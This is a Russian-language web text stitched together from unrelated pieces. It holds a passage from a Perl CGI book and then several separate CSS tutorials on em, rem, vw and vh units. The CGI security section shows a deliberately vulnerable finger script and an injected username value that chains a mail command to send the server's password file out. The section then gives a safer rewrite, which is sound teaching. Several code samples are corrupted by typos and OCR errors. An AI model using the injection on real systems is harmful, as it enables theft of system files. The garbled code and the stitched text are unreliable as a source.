
print $output->header,

$output->start_html(" Мой словарь ");

print "

\n";

while (($count < $start) and ($line = )) { $count++; }

while (($count < $start+10) and ($line = ))

print $line; $count++;

my $newnext = $start+10;

my $newprev = $start-10;

print "

unless (Sstart == 0)

{

print

qq%

Previous%;

}

unless (eof) { print qq% Next%;

# Заметьте, что имя пользователя "username" добавлено к URL.

# В противном случае CGI забудет, с каким пользователем имел дело.

}

print $output->end_html;

exit(0");

}

Меры безопасности

При работе серверов Интернет, будь они серверами HTTP или другого рода, соблюдение мер безопасности является важнейшей заботой. Обмен данными между клиентом и сервером, совершаемый в рамках

CGI, выдвигает ряд важных проблем, связанных с защитой данных. Сам протокол CGI достаточно защищен. CGI-программа получает данные от сервера через стандартное устройство ввода или переменные окружения, и оба эти метода являются безопасными. Но как только CGI-программа получает управление данными, ее действия ничем не ограничены. Плохо написанная CGI-программа может позволить злоумышленнику получить доступ к системе сервера. Рассмотрим следующий пример CGI-программы:

#!/usr/bin/perl -w

use CGI;

my $output = new CGI;

my $username = $output»param("username");

print $output->header, $output->start_html("Finger Output"),

"

",
 "finger $username", "
", $output->end_html;

Эта программа обеспечивает действующий CGI-интерфейс к команде finger. Если запустить программу просто как finger.cgi, она выведет список всех текущих пользователей на сервере. Если запустить ее как finger.cgi?username=fred, то она выведет информацию о пользователе «fred» на сервере. Можно даже запустить ее как finger. cgi?userna-me=bob@f oo.com для вывода информации об удаленном пользователе. Однако если запустить ее как finger.cgi?username=fred;[email protected]могут произойти нежелательные вещи. Оператор обратный штрих «"" » в Perl порождает процесс оболочки и выполняет команду, возвращающую результат. В данной программе "finger $username* используется как простой способ выполнить команду finger и получить ее результат. Однако большинство командных процессоров позволяет объединять в одной строке несколько команд. Например, любой процессор, подобный процессору Борна, делает это с помощью символа «; ». Поэтому "finger fred;mail [email protected]запустит сначала команду finger, а затем команду mail [email protected]которая может послать целиком файл паролей сервера нежелательному пользователю.

Одно из решений состоит в синтаксическом анализе поступивших от формы данных с целью поиска злонамеренного содержания. Можно, скажем, искать символ «;» и удалять все следующие за ним символы. Можно сделать такую атаку невозможной, используя альтернативные методы. Приведенную выше CGI-программу можно переписать так:

#!/usr/local/bin/perl -w

use CGI;

my $output = new CGI;

my $username = $output->param("username");

$|++;

# Отключить буферизацию с целью направления всех данных клиенту,

print $output->header, $putput->start_html("Finger Output"), "

\n";

$pid = open(C_OUT, "-|");# Эта идиома Perl порождает дочерний процесс и открывает

# канал между родительским и дочерним процессами,

if ($pid) {# Это родительский процесс.

print ; ft Вывести выходные данные дочернего процесса.

print "

", $output->end_html;

exit(O); ft Завершить программу. }

elsif (defined $pid) { # Это дочерний процесс.

$|++; # Отключить буферизацию.

ехес("/usr/bin/finger",$username) or die("exec() call failed.");

# Выполняет программу finger с Susername в качестве одного единственного
# аргумента командной строки. } else { die("неудачная попытка fork()"); }

# Проверка ошибок.

Как видите, это не на много более сложная программа. Но если запустить ее как finger.cgi?username=fred;[email protected]то программа finger будет выполняться с аргументом fred;mail [email protected]как одним именем пользователя.

В качестве дополнительной меры безопасности этот сценарий запускает finger явно как /usr/bin/finger. В маловероятном случае, когда веб-сервер передает вашей CGI-программе необычный PATH, запуск просто finger может заставить выполниться не ту программу, которая нужна. Еще одну меру безопасности можно принять, изучив переменную окружения PATH и убедившись, что она имеет приемлемое значение. Неплохо удалить из PATH текущий рабочий каталог, если только вы уверены, что это не тот случай, когда действительно нужно выполнить находящуюся в нем программу.

Другое важное соображение, касающееся безопасности, связано с правами пользователя. По умолчанию веб-сервер запускает программу CGI с правами того пользователя, который запустил сам сервер. Обычно это псевдопользователь, такой как «nobody», имеющий ограниченные права, поэтому у CGI-программы тоже мало прав. Обычно это хорошо, ибо, если злоумышленник сможет получить доступ к серверу через CGI-программу, ему не удастся причинить много вреда. Пример программы, крадущей пароли, показывает, что можно сделать, но фактический ущерб для системы, как правило, ограничен.

Однако работа в качестве пользователя с ограниченными правами ограничивает и возможности CGI. Если программе CGI нужно читать или записывать файлы, она может делать это только там, где у нее есть такое разрешение. Например, во втором примере запоминания состояния для каждого пользователя ведется файл. CGI-программа должна иметь разрешение на чтение и запись в каталоге, содержащем эти файлы, не говоря уже о самих файлах. Это можно сделать, создав каталог в качестве того же пользователя, что и сервер, с правами чтения и записи только для этого пользователя. Однако для такого пользователя, как «nobody», только root имеет подобную возможность. Если вы не суперпользователь, то вам придется общаться с администратором системы при каждом изменении в CGI.

Другой способ - сделать каталог свободным для чтения и записи, фактически сняв с него всякую защиту. Поскольку из внешнего мира получить доступ к этим файлам можно только через вашу программу, опасность не так велика, как может показаться. Однако если в программе обнаружится прореха, удаленный пользователь получит полный доступ ко всем файлам, в том числе возможность уничтожить их. Кроме того, законные пользователи, работающие на сервере, также получат возможность изменять эти файлы. Если вы собираетесь воспользоваться этим методом, то все пользователи сервера должны заслуживать доверия. Кроме того, используйте открытый каталог только для файлов, которые необходимы CGI-программе; иными словами, не подвергайте риску лишние файлы.

Если это ваше первое обращение к CGI-программированию, дальнейшее изучение можно продолжить разными путями. По этому предмету написаны десятки книг, многие из которых не предполагают никакого знакомства с программированием. «CGI Programming on the World Wide Web» издательства O"Reilly and Associates охватывает материал от простых сценариев на разных языках до действительно поразительных трюков и ухищрений. Общедоступная информация имеется также в изобилии в WWW. Неплохо начать с CGI Made Really Easy (Действительно просто о CGI) по адресу http://www.jmarshall.com/easy/cgi/ .

CGI и базы данных

С начала эпохи Интернет базы данных взаимодействовали с разработкой World Wide Web. На практике многие рассматривают Web просто как одну гигантскую базу данных мультимедийной информации.

Поисковые машины дают повседневный пример преимуществ баз данных. Поисковая машина не отправляется бродить по всему Интернету в поисках ключевых слов в тот момент, когда вы их запросили. Вместо этого разработчики сайта с помощью других программ создают гигантский указатель, который служит базой данных, откуда поисковый механизм извлекает записи. Базы данных хранят информацию в таком виде, который допускает быструю выборку с произвольным доступом.

Благодаря своей изменчивости базы данных придают Web еще большую силу: они превращают ее в потенциальный интерфейс для чего угодно. Например, системное администрирование можно производить удаленно через веб-интерфейс вместо требования регистрации администратора в нужной системе. Подключение баз данных к Web лежит в основе нового уровня интерактивности в Интернет.

Одна из причин подключения баз данных к Web регулярно дает о себе знать: значительная часть мировой информации уже находится в базах данных. Базы данных, существовавшие до возникновения Web, называются унаследованными (legacy) базами данных (в противоположность неподключенным к Web базам данных, созданным в недавнее время и которые следует назвать «дурной идеей»). Многие корпорации (и даже частные лица) стоят сейчас перед задачей обеспечения доступа к этим унаследованным базам данных через Web. Если только ваша унаследованная база не MySQL или mSQL, эта тема лежит за пределами данной книги.

Как сказано раньше, только ваше воображение может ограничить возможности связи между базами данных и Web. В настоящее время существуют тысячи уникальных и полезных баз данных, имеющие доступ из Web. Типы баз данных, действующих за пределами этих приложений, весьма различны. Некоторые из них используют CGI-программы в качестве интерфейса с сервером баз данных, таким как MySQL или mSQL. Эти типы представляют для нас наибольший интерес. Другие используют коммерческие приложения для взаимодействия с популярными настольными базами данных, такими как Microsoft Access и Claris FileMaker Pro. А другие просто работают с плоскими текстовыми файлами, являющимися самыми простыми базами данных изо всех возможных.

С помощью этих трех типов баз данных можно разрабатывать полезные веб-сайты любого размера и степени сложности. Одной из наших задач на протяжении нескольких следующих глав будет приложение мощи MySQL mSQL к Web с использованием CGI-программирования.

Ввиду распространенной привычки среди разработчиков использовать пиксельные значения, нам кажется, не все понимают настоящего предназначения параметров em, и того, как они работают в CSS.

Составляя некоторые руководства, нам так или иначе приходилось сталкиваться с этими значения, так что, сегодня нам есть что вам рассказать. Надеемся, что наше сегодняшнее руководство поможет вам отодвинуть занавес, накрывший столь удобную и продуманную технику, предназначенную для разработки веб-проектов.

Определение em

В спецификации представлено довольно параметру em:

Равное вычисленному значению параметра font-size, примененного к элементу


Другими словами, если у нас будет следующий код CSS:

Element {
font-size: 20px;
}
Это означает, что 1em, установленное в том элементе или в любом из его дочерних элементах, будет равное 20 пикселям. .

Если вы используете следующий код:

Element {
font-size: 20px;
width: 4em;
height: 4em;
}
Это означает, что ширины и высота элемента (указанные здесь как 4em x 4em) будут составлять 80px x 80px (20px * 4 = 80 px).

Рассмотрим подробнее

Ключом к запоминанию является предназначение em и происхождение данного параметра. Следуя :

Em – это единица изменения в типографии, равное текущему указанному размеру шрифта. Название em связано с буквой M. Изначально данная единица была получена из ширины заглавной буквы М при использовании определенного шрифта


Документация продолжена объяснением того, что, хотя название изначально и было основано на ширине буквы М, сейчас это уже не имеет значения. Так как на сегодняшний день единица измерения em связана с точечным размером шрифта.

Используя данный метод вычисления, в CSS-файле не бывает точного определения тому, что есть такое em. Значение данной единицы зависит от того, как составлены ваши каскадные таблицы стилей. Теоретически, если вы указали значение длины всех элементов в единице измерения em, то изменения одного лишь размера шрифта будет достаточно, чтобы «уничтожить» всю вашу точную до пикселя разметку.

А что если я не использую параметр font-size?

В примере, приведенном выше, и в JSBin, на который мы сослались, точно указан параметр font-size. Единица em впоследствии выводится из параметра «base». Но что если в элементе не указан точный параметр font-size?

В таком случае, так как параметр font-size наследуется по всему древу документа, значение единицы em будет выведен из того параметра, который был унаследован. Если во всем документе ни разу не упоминается параметр font-size, то значение отдельной единицы em будет равным 16 пикселям, что является значением по умолчанию (и нам кажется, что это не различается во всех браузерах).

«rem» должен быть автоматическим для людей

Пришло время привлечь и новое добавление в CSS: . Данная единица (название получено от «root em») отлично поддерживается во всех браузерах: IE9+, FF3.6+, Chrome, Safari 5+ и Opera 11.6+.

В целом, данная единица очень проста к пониманию. Она дает вам возможность сделать так, чтобы значения единиц em во всем HTML-документе были основаны на одном «главном» значении, указанном в «html »-элементе. Таким образом, вы можете забыть про параметр font-size, так как все em-единицы, использованные в документе, будут основаны на главном значении rem, например:

Html { font-size: 62.5%; }
body { font-size: 1.4rem; } /* =14px */
h1 { font-size: 2.4rem; } /* =24px */
И, как и в случае с em, если вы не указываете значение font-size в «html »-элементе, то «главная» единица (root em) будет равна 16 пикселям по умолчанию.

Carpe di-em

Можно выдумать еще целую кучу выражений с em:)

Проработав в разработке веб-сайтов множество лет, мы наконец-то можем отказаться от фиксированных значений ширины. Хотя многие уже перешли на разработку адаптивных дизайнов, все по-прежнему время от времени используют пиксельные значения. Хотя этого может быть достаточно для элементов шаблона, нам кажется, что именно типографику стоит полностью переводить на значения em.

Несмотря на то, что мы можем создать целый шаблон с использованием единиц em, нам кажется, что в адаптивных шаблонах все равно лучше использовать пиксельные значения и процентное соотношение и, как уже было отмечено, для типографики использовать em.

Итак, надеемся, вам понравилось наше сегодняшнее руководство, и вы найдете применение полученным знаниям.

Не забываем комментировать!

Для задания размеров различных элементов в CSS используются абсолютные и относительные единицы измерения. Абсолютные единицы не зависят от устройства вывода, а относительные единицы определяют размер элемента относительно значения другого размера.

Относительные единицы

Относительные единицы обычно используют для работы с текстом. В табл. 1 перечислены основные относительные единицы.

Единица em это изменяемое значение, которое зависит от размера шрифта текущего элемента (размер устанавливается через стилевое свойство font-size ). В каждом браузере заложен размер текста, применяемый в том случае, когда этот размер явно не задан. Поэтому изначально 1em равен размеру шрифта, заданного в браузере по умолчанию или размеру шрифта родительского элемента. Процентная запись идентична em , в том смысле, что значения 1em и 100% равны.

Единица ex определяется как высота символа «x» в нижнем регистре. На ex распространяются те же правила, что и для em , а именно, он привязан к размеру шрифта, заданного в браузере по умолчанию, или к размеру шрифта родительского элемента.

Единица ch равна ширине символа «0» для текущего элемента и подобно em зависит от размера шрифта.

Разница между em и rem следующая. em зависит от размера шрифта родителя элемента и меняется вместе с ним, а rem привязан к корневому элементу, т. е. размеру шрифта заданного для элемента html .

Также есть группа относительных единиц привязанных к размеру области просмотра браузера. В табл. 2 показан их список с описанием.

Абсолютные единицы

Абсолютные единицы представляют собой физические размеры - дюймы, сантиметры, миллиметры, пункты, пики, а также пиксели. Для устройств с низким dpi (количество точек приходящихся на один дюйм, определяет плотность точек) привязка идёт к пикселю. В этом случае один дюйм равен 96 пикселям. Очевидно, что реальный дюйм не будет совпадать с дюймом на таком устройстве. На устройствах с высоким dpi реальный дюйм совпадает с дюймом на экране, поэтому размер пикселя вычисляется как 1/96 от дюйма. В табл. 3 перечислены основные абсолютные единицы.

Пример

Относительные единицы

Заголовок размером 30 пикселей

Размер текста 1.5 em

Абсолютные единицы

Заголовок размером 24 пункта

Сдвиг текста вправо на 30 миллиметров

Примечание

При установке размеров обязательно указывайте единицы измерения, например width : 30px . В противном случае браузер не сможет показать желаемый результат, поскольку не понимает, какой размер вам требуется. Единицы не добавляются только при нулевом значении (margin : 0 ).

Internet Explorer поддерживает единицу vm вместо vmin .

Спецификация

Каждая спецификация проходит несколько стадий одобрения.

  • Recommendation (Рекомендация ) - спецификация одобрена W3C и рекомендована как стандарт.
  • Candidate Recommendation (Возможная рекомендация ) - группа, отвечающая за стандарт, удовлетворена, как он соответствует своим целям, но требуется помощь сообщества разработчиков по реализации стандарта.
  • Proposed Recommendation (Предлагаемая рекомендация ) - на этом этапе документ представлен на рассмотрение Консультативного совета W3C для окончательного утверждения.
  • Working Draft (Рабочий проект ) - более зрелая версия черновика после обсуждения и внесения поправок для рассмотрения сообществом.
  • Editor"s draft (Редакторский черновик ) - черновая версия стандарта после внесения правок редакторами проекта.
  • Draft (Черновик спецификации ) - первая черновая версия стандарта.
×

В CSS3 появились новые единицы измерения. (Я, кажется, уже говорил об этом. eng ) Вы уже слышали о px, pt, em и новых rem. Давайте рассмотри еще несколько: vw и vh.

Часто в макете есть элементы, которые гарантировано должны умещаться во вьюпорт браузера. В общем случае для этого используется JavaScript. Проверям размер вьюпорта и изменяем размеры элементов соответствующим образом. Если пользователь изменяет размер окна браузера, то процедура повторяется.

С помощью vw/vh мы можем устанавливать размер элементов относительно размера вьюпорта. Единицы vw/vh интересны тем, что 1vw - единица равная 1/100"ой ширины вьюпорта. Что бы присвоить элементу ширину, равную ширине вьюпорта, например, надо установить width:100vw.

Как это можно использовать

Лайтбоксы - прекрасный кандидат для использования vw и vh, так как обычно позиционируется относительно вьюпорта, однако мне кажется, что position:fixed со значениями top, bottom, left и right использовать проще, так как можно вообще не устанавливать высоту и ширину .

Можно использовать новые единицы измерения для установки размеров элементов, которые находятся в нормальном потоке. Например, я могу разместить на странице скриншоты. Высота этих скриншотов не должна превышать высоту вьюпорта. Для этого я могу установить максимальную высоту изображений:

Img { max-height:95vh; }

В данном случае я устанавливаю высоту 95vh что бы оставить немного места вокруг, когда они на экране.

Поддержка браузерами

Если rem поддерживаются почти всеми основными браузерами включая IE9, то с использованием vw и vh стоит повременить. На данный момент их поддерживает только Internet Explorer 9.

Загрузка...